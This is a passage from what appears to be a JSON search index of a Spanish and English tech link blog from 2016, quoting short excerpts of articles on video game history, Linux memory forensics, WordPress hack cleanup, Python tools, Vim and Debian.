prácticamente desaparecer por completo.\n» Javier Ortizá | malavida.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/18/los-tres-anos-que-cambiaron-para-siempre-la-industria-del-videojuego/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEs un periodo en la historia del software bien diferenciado. Uno en el que\nmuchos jugadores se sumaron a la industria, sin saber apenas qué había\nantes. Probablemente también fueron los años en los que nacieron un mayor\nnúmero de propiedades intelectuales. Y también es el inicio de la\ngeneración PlayStation, asentándose un modelo de negocio (consumo rápido,\ngran oferta de videojuegos) que permanece hasta nuestros días. Hablamos de\nuna época que empieza en 1993 y acaba en 1996. Tres años en los que los\nvideojuegos en dos dimensiones pasaron de dominar la industria (y ser casi\nel único camino viable en ella) a prácticamente desaparecer por completo.\u003c/p\u003e","title":"Los tres años que cambiaron para siempre la industria del videojuego"},{"content":" En primer lugar, igual que hice en la entrada anterior “Volcado de memoria RAM en Windows – OSForensics”, voy a recordar la importancia de las buenas prácticas, recordando la necesidad de conocer y seguir la RFC 3227, que lleva por título “Guidelines for Evidence Collection and Archiving”, (Directrices para la recolección y archivo de la Evidencia). Vuelvo a decir: recomiendo encarecidamente su lectura.\nEn esta ocasión, vamos a realizar un volcado de memoria de un sistema Linux.\nPara ello, vamos a usar LiME, (Linux Memory Extractor). LiME es una herramienta desarrollada por 504ensics Labs, de código abierto, que permite la adquisición de la memoria volátil de sistemas Linux y dispositivos basados en Linux, como Android, y que trabaja a nivel de kernel.\n» @N4rr34n6 | fwhibbit.blogpost.com.es\n","permalink":"http://karpoke.ignaciocano.com/2016/09/17/volcado-de-memoria-ram-en-linux-lime/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn primer lugar, igual que hice en la entrada anterior “Volcado de memoria\nRAM en Windows – OSForensics”, voy a recordar la importancia de las buenas\nprácticas, recordando la necesidad de conocer y seguir la \u003ca href=\"https://www.ietf.org/rfc/rfc3227.txt\"\u003eRFC 3227\u003c/a\u003e, que\nlleva por título “Guidelines for Evidence Collection and Archiving”,\n(Directrices para la recolección y archivo de la Evidencia). Vuelvo a decir:\nrecomiendo encarecidamente su lectura.\u003c/p\u003e\n\u003cp\u003eEn esta ocasión, vamos a realizar un volcado de memoria de un sistema Linux.\u003c/p\u003e","title":"Volcado de memoria #RAM en #Linux - #LiME"},{"content":" Our content, web design, and development teams spent months putting together a brand new guide to walk users through the process of identifying and clearing a WordPress hack, as well as ensuring post-hack actions are taken using the free Sucuri plugin.\n» Alycia Mitchell | sucuri.net\n","permalink":"http://karpoke.ignaciocano.com/2016/09/17/a-guide-to-fix-hacked-wordpress-sites/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOur content, web design, and development teams spent months putting together\na brand new guide to walk users through the process of identifying and\nclearing a WordPress hack, as well as ensuring post-hack actions are taken\nusing the free Sucuri plugin.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Alycia Mitchell | \u003ca href=\"https://blog.sucuri.net/2016/09/guide-for-hacked-wordpress.html\"\u003esucuri.net\u003c/a\u003e\u003c/p\u003e","title":"A guide to fix hacked WordPress sites"},{"content":" » Real Engineering | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/17/transistors-the-invention-that-changed-the-world/","summary":"\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/OwS9aTE2Go4?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» Real Engineering | \u003ca href=\"https://www.youtube.com/watch?v=OwS9aTE2Go4\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"Transistors - The invention that changed the world"},{"content":" Un lenguaje informático no es más que un conjunto de instrucciones que introducimos en una máquina para que esta opere permitiéndonos así desarrollar programas. De este modo, las distintas formas en que combinamos dichas instrucciones dan lugar a los diferentes estilos y escuelas responsables de lo que podemos denominar ‘la estética de la programación‘.\nEsa estética, según las reglas a las que responda, se puede clasificar a su vez en cuatro grandes grupos que tradicionalmente, como muchas corrientes artísticas, han coexistido de forma simultánea…\n» Carlos Benítez | etnassoft.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/16/la-estetica-del-codigo-fuente-a-la-busqueda-del-arte-en-la-programacion/","summary":"\u003cblockquote\u003e\n\u003cp\u003eUn lenguaje informático no es más que un conjunto de instrucciones que\nintroducimos en una máquina para que esta opere permitiéndonos así\ndesarrollar programas. De este modo, las distintas formas en que combinamos\ndichas instrucciones dan lugar a los diferentes estilos y escuelas\nresponsables de lo que podemos denominar ‘la estética de la programación‘.\u003c/p\u003e\n\u003cp\u003eEsa estética, según las reglas a las que responda, se puede clasificar a su\nvez en cuatro grandes grupos que tradicionalmente, como muchas corrientes\nartísticas, han coexistido de forma simultánea…\u003c/p\u003e","title":"La estética del código fuente: a la búsqueda del Arte en la Programación"},{"content":" Volvemos a la crónica tecnológica de Mr. Robot con el análisis del sexto capítulo de la segunda temporada. El inicio nos dejó bastante descolocados a casi todos los seguidores de la serie, especialmente por el cambio de registro. No vamos a entrar en detalles puesto que es una sorpresa que merece que cada uno vea libre de spoilers pero, personalmente, creo que es de lo mejor que se ha hecho en televisión en los últimos años.\nA partir de este punto se comentan SPOILERS por lo que recomendamos leer solo si estás dispuesto a conocer algún que otro detalle del episodio Mr. Robot S02E06.\n» Josep Albors | welivesecurity.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/11/mr-robot-s02e06-easter-eggs-mas-elaborados-y-un-curso-acelerado-de-hacking/","summary":"\u003cblockquote\u003e\n\u003cp\u003eVolvemos a la crónica tecnológica de Mr. Robot con el análisis del sexto\ncapítulo de la segunda temporada. El inicio nos dejó bastante descolocados\na casi todos los seguidores de la serie, especialmente por el cambio de\nregistro. No vamos a entrar en detalles puesto que es una sorpresa que merece\nque cada uno vea libre de spoilers pero, personalmente, creo que es de lo\nmejor que se ha hecho en televisión en los últimos años.\u003c/p\u003e","title":"Mr. Robot S02E06: easter eggs más elaborados y un curso acelerado de hacking"},{"content":" Here’s a simple way to make traffic disappear.\n» CPG Grey | via geeksaresexy.net\n","permalink":"http://karpoke.ignaciocano.com/2016/09/11/the-simple-solution-to-eliminate-traffic/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHere’s a simple way to make traffic disappear.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/iHzzSao6ypE?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» \u003ca href=\"https://www.youtube.com/channel/UC2C_jShtL725hvbm1arSV9w\"\u003eCPG Grey\u003c/a\u003e | via \u003ca href=\"https://www.geeksaresexy.net/2016/09/03/simple-solution-eliminate-traffic/\"\u003egeeksaresexy.net\u003c/a\u003e\u003c/p\u003e","title":"The simple solution to eliminate traffic"},{"content":" A ”reverse debugger” is a debugger where you can go forward and backward in time. It is an uncommon feature, at least in the open source world, but I have no idea why. I have used undodb-gdb and rr, which are reverse debuggers for C code, and I can only say that they saved me many, many days of poking around blindly in gdb.\nThe PyPy team is pleased to give you ”RevPDB”, a reverse-debugger similar to rr but for Python.\n» Armin Rigo | morepypy.blogspot.com.es\n","permalink":"http://karpoke.ignaciocano.com/2016/09/11/reverse-debugging-for-python/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA ”reverse debugger” is a debugger where you can go forward and backward in\ntime. It is an uncommon feature, at least in the open source world, but I\nhave no idea why. I have used undodb-gdb and rr, which are reverse debuggers\nfor C code, and I can only say that they saved me many, many days of poking\naround blindly in gdb.\u003c/p\u003e\n\u003cp\u003eThe PyPy team is pleased to give you ”RevPDB”, a reverse-debugger similar to\nrr but for Python.\u003c/p\u003e","title":"Reverse debugging for Python"},{"content":" So I setup a benchmark, which can be found here to compare Python datetime, Arrow, Pendulum, Delorean and udatetime on a performance level. I picked 4 typical performance critical operations to measure the speed of those libraries.\nDecode a date-time string Encode (serialize) a date-time string Instantiate object with current time in UTC Instantiate object with current time in local timezone Instantiate object from timestamp in UTC Instantiate object from timestamp in local timezone » Simon Pirschel | aboutsimon.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/11/datetime-vs-arrow-vs-pendulum-vs-delorean-vs-udatetime/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSo I setup a benchmark, which can be found here to compare Python datetime,\nArrow, Pendulum, Delorean and udatetime on a performance level. I picked 4\ntypical performance critical operations to measure the speed of those\nlibraries.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDecode a date-time string\u003c/li\u003e\n\u003cli\u003eEncode (serialize) a date-time string\u003c/li\u003e\n\u003cli\u003eInstantiate object with current time in UTC\u003c/li\u003e\n\u003cli\u003eInstantiate object with current time in local timezone\u003c/li\u003e\n\u003cli\u003eInstantiate object from timestamp in UTC\u003c/li\u003e\n\u003cli\u003eInstantiate object from timestamp in local timezone\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Simon Pirschel | \u003ca href=\"https://aboutsimon.com/blog/2016/08/04/datetime-vs-Arrow-vs-Pendulum-vs-Delorean-vs-udatetime.html\"\u003eaboutsimon.com\u003c/a\u003e\u003c/p\u003e","title":"datetime vs Arrow vs Pendulum vs Delorean vs udatetime"},{"content":" Al, like a lot of you out there, thinks that he “knows how to use vi”. I’m here to tell you that he doesn’t. And unless you’ve spent the last few years alone in a cave high in the Himalayas, with only food, drink, a laptop, and Vim Golf, you probably don’t either. Heck, I don’t consider myself a Vim master, but I’m going to write this overwrought essay praising it (using Vim, naturally).\n» Elliot Williams | hackaday.com\n","permalink":"http://karpoke.ignaciocano.com/2016/09/11/editor-wars-the-revenge-of-vim/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAl, like a lot of you out there, thinks that he “knows how to use vi”.\nI’m here to tell you that he doesn’t. And unless you’ve spent the last\nfew years alone in a cave high in the Himalayas, with only food, drink,\na laptop, and Vim Golf, you probably don’t either. Heck, I don’t\nconsider myself a Vim master, but I’m going to write this overwrought\nessay praising it (using Vim, naturally).\u003c/p\u003e","title":"Editor wars: the revenge of vim"},{"content":" A while back I was researching the most efficient way to check if a number is prime. This lead me to find the following piece of code:\npublic static boolean isPrime(int n) { return !new String(new char[n]).matches(”.?|(..+?)\\\\1+”); } I was intrigued. While this might not be the most efficient way, it’s certainly one of the less obvious ones, so my curiosity kicked in. How on Earth could a match for the .?|(..+?)\\1+ regular expression tell that a number is not prime (once it’s converted to its unary representation)?\n» iluxonchik | iluxonchik.github.io\n","permalink":"http://karpoke.ignaciocano.com/2016/09/10/demystifying-the-regular-expression-that-checks-if-a-number-is-prime/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA while back I was researching the most efficient way to check if a number\nis prime. This lead me to find the following piece of code:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003epublic static boolean isPrime(int n) {\n    return !new String(new char[n]).matches(”.?|(..+?)\\\\1+”);\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eI was intrigued. While this might not be the most efficient way, it’s\ncertainly one of the less obvious ones, so my curiosity kicked in. How on\nEarth could a match for the .?|(..+?)\\1+ regular expression tell that a\nnumber is not prime (once it’s converted to its unary representation)?\u003c/p\u003e","title":"Demystifying the regular expression that checks if a number is prime"},{"content":" DEF CON 24 - Panel - MR ROBOT Panel\n» DEFCONConference | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2016/08/26/def-con-24-panel-mr-robot-panel/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDEF CON 24 - Panel - MR ROBOT Panel\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/_bBrj6QBPW0?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» DEFCONConference | \u003ca href=\"https://www.youtube.com/watch?v=_bBrj6QBPW0\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"DEF CON 24 - Panel - MR ROBOT Panel"},{"content":" What the heck is the event loop anyway? | Philip Roberts | JSConf EU\n» JSConf | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2016/08/25/what-the-heck-is-the-event-loop-anyway-philip-roberts-jsconf-eu/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhat the heck is the event loop anyway? | Philip Roberts | JSConf EU\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/8aGhZQkoFbQ?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» JSConf | \u003ca href=\"https://www.youtube.com/watch?v=8aGhZQkoFbQ\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"What the heck is the event loop anyway? | Philip Roberts | JSConf EU"},{"content":" Llevo más de 5 años usando Debian y la verdad es que estoy más que satisfecho. De momento no me planteo cambiar de distribución básicamente por los siguientes motivos:\nSus repositorios son excelentes La metodologia de desarrollo seguida por debian Estabilidad y seguridad Soporte existente para la distribución Ofrece múltiples posibilidades de instalación y uso Filosofia de la distribución La instalo una vez y me olvido para siempre » Joan | geekland.eu\n","permalink":"http://karpoke.ignaciocano.com/2016/08/14/motivos-por-los-que-recomiendo-usar-la-distribucion-debian-en-linux/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLlevo más de 5 años usando Debian y la verdad es que estoy más que\nsatisfecho. De momento no me planteo cambiar de distribución\nbásicamente por los siguientes motivos:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSus repositorios son excelentes\u003c/li\u003e\n\u003cli\u003eLa metodologia de desarrollo seguida por debian\u003c/li\u003e\n\u003cli\u003eEstabilidad y seguridad\u003c/li\u003e\n\u003cli\u003eSoporte existente para la distribución\u003c/li\u003e\n\u003cli\u003eOfrece múltiples posibilidades de instalación y uso\u003c/li\u003e\n\u003cli\u003eFilosofia de la distribución\u003c/li\u003e\n\u003cli\u003eLa instalo una vez y me olvido para siempre\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Joan | \u003ca href=\"http://geekland.eu/motivos-para-debian-en-linux/\"\u003egeekland.eu\u003c/a\u003e\u003c/p\u003e","title":"Motivos por los que recomiendo usar la distribución Debian en Linux"},{"content":" Primero digamos que en este post vamos a tocar los temas de las APKs de Android, que es el formato utilizado para empaquetar las aplicaciones. También vamos a tocar Metasploit, una gran herramienta para los pentesters, esta herramienta se basa en módulos los cuales permiten hacer (sobre todo intentos) de explotación de sistemas, con los módulos de exploit que cuenta la herramienta, o módulos auxiliares. Usaremos dos de las herramientas con las que cuenta metasploit: msfvenom (para generar payloads, dando la posibilidad de pasarlos por un encoder) y msfconsole (consola de comandos para hacer uso de exploits, modulos auxiliares\u0026hellip;). Vamos a realizar un sencillo proceso de Ingeniería inversa en android, pero bastante sencillo.\n» Fare9 | estacion-informatica.com\n\u0026#34;Meterpretear una apk\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2016/08/14/meterpretear-una-apk/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePrimero digamos que en este post vamos a tocar los temas de las APKs de\nAndroid, que es el formato utilizado para empaquetar las aplicaciones.\nTambién vamos a tocar Metasploit, una gran herramienta para los pentesters,\nesta herramienta se basa en módulos los cuales permiten hacer (sobre todo\nintentos) de explotación de sistemas, con los módulos de exploit que cuenta\nla herramienta, o módulos auxiliares. Usaremos dos de las herramientas con\nlas que cuenta metasploit: msfvenom (para generar payloads, dando la\nposibilidad de pasarlos por un encoder) y msfconsole (consola de comandos\npara hacer uso de exploits, modulos auxiliares\u0026hellip;).\nVamos a realizar un sencillo proceso de Ingeniería inversa en android, pero\nbastante sencillo.\u003c/p\u003e","title":"Meterpretear una apk"},{"content":" Lepton achieves a 22% savings reduction for existing JPEG images, by predicting coefficients in JPEG blocks and feeding those predictions as context into an arithmetic coder. Lepton preserves the original file bit-for-bit perfectly. It compresses JPEG files at a rate of 5 megabytes per second and decodes them back to the original bits at 15 megabytes per second, securely, deterministically, and in under 24 megabytes of memory.\n» Daniel Reiter Horn | dropbox.com\n","permalink":"http://karpoke.ignaciocano.com/2016/07/17/lepton-image-compression-saving-22-percent-losslessly-from-images-at-15mbps/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLepton achieves a 22% savings reduction for existing JPEG images, by\npredicting coefficients in JPEG blocks and feeding those predictions as\ncontext into an arithmetic coder. Lepton preserves the original file\nbit-for-bit perfectly. It compresses JPEG files at a rate of 5 megabytes per\nsecond and decodes them back to the original bits at 15 megabytes per second,\nsecurely, deterministically, and in under 24 megabytes of memory.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Daniel Reiter Horn | \u003ca href=\"https://blogs.dropbox.com/tech/2016/07/lepton-image-compression-saving-22-losslessly-from-images-at-15mbs/\"\u003edropbox.com\u003c/a\u003e\u003c/p\u003e","title":"Lepton image compression: saving 22% losslessly from images at 15MB/s"},{"content":" A comprehensive video covering how to set up your Raspberry Pi Zero so that you can access it via the USB port. Yes, plug it in to a USB port and you can use the command line or with a few tweaks a full graphical desktop. Great for on the go or when another monitor or screen is not suitable. (It even supports Minecraft which can be played)\n» Te Co Ed | youtube.com | via raspberrypi.org\n","permalink":"http://karpoke.ignaciocano.com/2016/07/10/programming-the-pi-over-usb/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA comprehensive video covering how to set up your Raspberry Pi Zero so that\nyou can access it via the USB port. Yes, plug it in to a USB port and you\ncan use the command line or with a few tweaks a full graphical desktop.\nGreat for on the go or when another monitor or screen is not suitable.\n(It even supports Minecraft which can be played)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/4gLzJGrkfVw?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» Te Co Ed | \u003ca href=\"https://www.youtube.com/watch?v=4gLzJGrkfVw\"\u003eyoutube.com\u003c/a\u003e | via \u003ca href=\"https://www.raspberrypi.org/blog/programming-pi-zero-usb/\"\u003eraspberrypi.org\u003c/a\u003e\u003c/p\u003e","title":"Programming the Pi over USB"},{"content":" When a very young child looks at a picture, she can identify simple elements: ”cat,” ”book,” ”chair.” Now, computers are getting smart enough to do that too. What’s next? In a thrilling talk, computer vision expert Fei-Fei Li describes the state of the art — including the database of 15 million photos her team built to ”teach” a computer to understand pictures — and the key insights yet to come.\n» Fei Fei Li | youtube.com | via xombra.com\n","permalink":"http://karpoke.ignaciocano.com/2016/06/29/how-we-teach-computers-to-understand-pictures/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhen a very young child looks at a picture, she can identify simple elements:\n”cat,” ”book,” ”chair.” Now, computers are getting smart enough to do that\ntoo. What’s next? In a thrilling talk, computer vision expert Fei-Fei Li\ndescribes the state of the art — including the database of 15 million photos\nher team built to ”teach” a computer to understand pictures — and the key\ninsights yet to come.\u003c/p\u003e","title":"How We Teach Computers to Understand Pictures"},{"content":" Los que llevamos unos cuantos años utilizando ordenadores hemos visto pasar por nuestras manos todo tipo de puertos. Hasta la introducción y estandarización del USB, muchos de los dispositivos que utilizábamos tenían conectores diferentes, y algunos hasta propietarios. Vamos a recordar algunos de ellos.\n» Alberto García | adslzone.net\n","permalink":"http://karpoke.ignaciocano.com/2016/06/28/sentiras-nostalgia-al-ver-los-puertos-que-has-utilizado-en-tu-pc/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLos que llevamos unos cuantos años utilizando ordenadores hemos visto pasar\npor nuestras manos todo tipo de puertos. Hasta la introducción y\nestandarización del USB, muchos de los dispositivos que utilizábamos tenían\nconectores diferentes, y algunos hasta propietarios. Vamos a recordar algunos\nde ellos.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003cimg alt=\"Sentirás nostalgia al ver los puertos que has utilizado en tu PC\" loading=\"lazy\" src=\"/images/puertos.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003e» Alberto García | \u003ca href=\"http://www.adslzone.net/2016/06/23/sentiras-nostalgia-al-ver-los-puertos-que-has-utilizado-en-tu-pc/\"\u003eadslzone.net\u003c/a\u003e\u003c/p\u003e","title":"Sentirás nostalgia al ver los puertos que has utilizado en tu PC"},{"content":" IBM era el dueño y señor de los bits y los bytes a principios de los 80. En aquella época Apple, Microsoft y los fabricantes de aquellos legendarios ordenadores de 8 bits también despuntaban, pero todo daba igual: el gigante azul dominaba con mano firme la informática empresarial, y para muestra un botón: el PC no se llamaba PC. Se llamaba IBM PC.\n» Javier Pastor | xataka.com\n","permalink":"http://karpoke.ignaciocano.com/2016/06/13/asi-es-como-la-ingenieria-inversa-cambio-la-historia-de-la-informatica-para-siempre/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIBM era el dueño y señor de los bits y los bytes a principios de los 80. En\naquella época Apple, Microsoft y los fabricantes de aquellos legendarios\nordenadores de 8 bits también despuntaban, pero todo daba igual: el gigante\nazul dominaba con mano firme la informática empresarial, y para muestra un\nbotón: el PC no se llamaba PC. Se llamaba IBM PC.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Javier Pastor | \u003ca href=\"http://www.xataka.com/historia-tecnologica/asi-es-como-la-ingenieria-inverso-cambio-la-historia-de-la-informatica-para-siempre\"\u003exataka.com\u003c/a\u003e\u003c/p\u003e","title":"Así es como la ingeniería inversa cambió la historia de la informática para siempre"},{"content":" One of the toughest things to get right in a Python program is Unicode handling. If you’re reading this, you’re probably in the middle of discovering this the hard way.\nThe main reasons Unicode handling is difficult in Python is because the existing terminology is confusing, and because many cases which could be problematic are handled transparently. This prevents many people from ever having to learn what’s really going on, until suddenly they run into a brick wall when they want to handle data that contains characters outside the ASCII character set.\n» Derek Dohler | azavea.com\n","permalink":"http://karpoke.ignaciocano.com/2016/06/08/solving-unicode-problems-in-python-2-7/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOne of the toughest things to get right in a Python program is Unicode\nhandling. If you’re reading this, you’re probably in the middle of\ndiscovering this the hard way.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThe main reasons Unicode handling is difficult in Python is because the\nexisting terminology is confusing, and because many cases which could be\nproblematic are handled transparently. This prevents many people from ever\nhaving to learn what’s really going on, until suddenly they run into a brick\nwall when they want to handle data that contains characters outside the ASCII\ncharacter set.\u003c/p\u003e","title":"Solving Unicode Problems in Python 2.7"},{"content":" Es un programa que genera una inmensa polémica, del que se está oyendo hablar cada vez más y que es utilizado por la mayoría de distribuciones. Sus detractores son muchos, sin embargo es utilizado cada vez por más distribuciones Linux. Así que surgen las preguntas. ¿Porqué SystemD es tan malo? Y si es tan malo, ¿porqué cada vez más distribuciones lo están utilizando?\n» Amancio | lignux.com\n","permalink":"http://karpoke.ignaciocano.com/2016/06/05/la-polemica-systemd/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEs un programa que genera una inmensa polémica, del que se está oyendo\nhablar cada vez más y que es utilizado por la mayoría de\ndistribuciones. Sus detractores son muchos, sin embargo es utilizado cada\nvez por más distribuciones Linux. Así que surgen las preguntas. ¿Porqué\nSystemD es tan malo? Y si es tan malo, ¿porqué cada vez más distribuciones\nlo están utilizando?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Amancio | \u003ca href=\"https://lignux.com/la-polemica-systemd/\"\u003elignux.com\u003c/a\u003e\u003c/p\u003e","title":"La polémica SystemD"},{"content":" Hay aspectos tan mínimos en lo que usamos a diario que a menudo no reparamos en ellos hasta que, de repente, nos los cambian. Un ejemplo es esto que comentaremos ahora: ¿suenan igual todos los tonos de espera tras el marcado? Si sólo llamáis a contactos de vuestro país no habréis notado la diferencia, pero la cosa cambia para las llamadas internacionales.\n» Ivan Linares | elandroidelibre.com\n","permalink":"http://karpoke.ignaciocano.com/2016/06/02/el-origen-del-tono-que-escuchamos-al-hacer-una-llamada/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHay aspectos tan mínimos en lo que usamos a diario que a menudo no reparamos\nen ellos hasta que, de repente, nos los cambian. Un ejemplo es esto que\ncomentaremos ahora: ¿suenan igual todos los tonos de espera tras el marcado?\nSi sólo llamáis a contactos de vuestro país no habréis notado la\ndiferencia, pero la cosa cambia para las llamadas internacionales.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Ivan Linares | \u003ca href=\"http://www.elandroidelibre.com/2016/06/historia-tonos-espera-llamadas.html\"\u003eelandroidelibre.com\u003c/a\u003e\u003c/p\u003e","title":"El origen del tono que escuchamos al hacer una llamada"},{"content":" Have you ever heard of SEMA? It’s a fairly esoteric system for measuring how good a software team is. No, wait! Don’t follow that link! It will take you about six years just to understand that stuff. So I’ve come up with my own, highly irresponsible, sloppy test to rate the quality of a software team. The great part about it is that it takes about 3 minutes. With all the time you save, you can go to medical school.\n» Joel Spolsky | joelonsoftware.com\n","permalink":"http://karpoke.ignaciocano.com/2016/05/31/the-joel-test-12-steps-to-better-code/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHave you ever heard of SEMA? It’s a fairly esoteric system for measuring\nhow good a software team is. No, wait! Don’t follow that link! It will take\nyou about six years just to understand that stuff. So I’ve come up with my\nown, highly irresponsible, sloppy test to rate the quality of a software\nteam. The great part about it is that it takes about 3 minutes. With all the\ntime you save, you can go to medical school.\u003c/p\u003e","title":"The Joel Test: 12 Steps to Better Code"},{"content":" La abadía del crimen fue publicado en 1987, en el cénit de los viejos microordenadores de 8-bits. Sus diseñadores, Paco Menéndez y Juan Delcán, lo diseñaron en un Amstrad CPC6128, el último gran ordenador de ese periodo —tecnología punta de 1985, con 128 KB de RAM y una inusual disquetera de tres pulgadas.\n» Roger Senserrich | jotdown.es\n","permalink":"http://karpoke.ignaciocano.com/2016/02/29/espana-y-el-software-que-fue/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa abadía del crimen fue publicado en 1987, en el cénit de los viejos\nmicroordenadores de 8-bits. Sus diseñadores, Paco Menéndez y Juan\nDelcán, lo diseñaron en un Amstrad CPC6128, el último gran ordenador\nde ese periodo —tecnología punta de 1985, con 128 KB de RAM y una\ninusual disquetera de tres pulgadas.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Roger Senserrich | \u003ca href=\"http://www.jotdown.es/2016/02/espana-software-fue/\"\u003ejotdown.es\u003c/a\u003e\u003c/p\u003e","title":"España y el software que fue"},{"content":" I asked on Twitter if people would be interested in having me write down the history behind my decision to choose GitHub for Python’s future development process and people said ”yes”(some literally), hence this blog post.\n» Brett Cannon | snarky.ca\n","permalink":"http://karpoke.ignaciocano.com/2016/02/07/the-history-behind-the-decision-to-move-python-to-github/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI asked on Twitter if people would be interested in having me write\ndown the history behind my decision to choose GitHub for Python’s\nfuture development process and people said ”yes”(some literally),\nhence this blog post.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Brett Cannon | \u003ca href=\"http://www.snarky.ca/the-history-behind-the-decision-to-move-python-to-github\"\u003esnarky.ca\u003c/a\u003e\u003c/p\u003e","title":"The history behind the decision to move Python to GitHub"},{"content":" The first rule of C is don’t write C if you can avoid it. If you must write in C, you should follow modern rules. C has been around since the early 1970s. People have ”learned C” at various points during its evolution, but knowledge usually get stuck after learning, so everybody has a different set of things they believe about C based on the year(s) they first started learning.\n» Matt | 